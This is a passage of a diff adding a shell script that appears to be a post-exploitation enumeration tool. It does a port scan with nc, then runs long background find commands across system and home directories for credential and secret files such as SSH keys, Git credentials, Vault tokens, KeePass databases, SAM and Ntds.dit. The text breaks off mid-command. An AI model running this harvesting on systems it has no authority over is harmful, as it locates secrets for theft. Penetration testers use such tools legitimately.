+ fi + exit 0 + +elif [ "$IP" ]; then + select_nc + tcp_port_scan $IP "$PORTS" + exit 0 +fi + + +if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep IntFiles`" ] || [ "`echo $CHECKS | grep SofI`" ]; then + ########################################### + #----------) Caching Finds (--------------# + ########################################### + + printf $GREEN"Caching directories "$NC + + + #Get home + HOMESEARCH="/home/ /Users/ /root/ `cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " "`" + if [ ! "`echo \"$HOMESEARCH\" | grep \"$HOME\"`" ] && [ ! "`echo \"$HOMESEARCH\" | grep -E \"^/root|^/home|^/Users\"`" ]; then #If not listed and not in /home, /Users/ or /root, add current home folder + HOMESEARCH="$HOME $HOMESEARCH" + fi + GREPHOMESEARCH=`echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|"` #Remove ending spaces before putting "|" + + CONT_THREADS=0 + # FIND ALL KNOWN INTERESTING SOFTWARE FILES + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"system.d\" -o -name \".bluemix\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \"bind\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".bluemix\" -o -name \"couchdb\" -o -name \"logstash\" -o -name \"bind\" -o -name \"mysql\" -o -name \"filezilla\" -o -name \".vnc\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \"ldap\" -o -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sites-enabled\" -o -name \".svn\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o 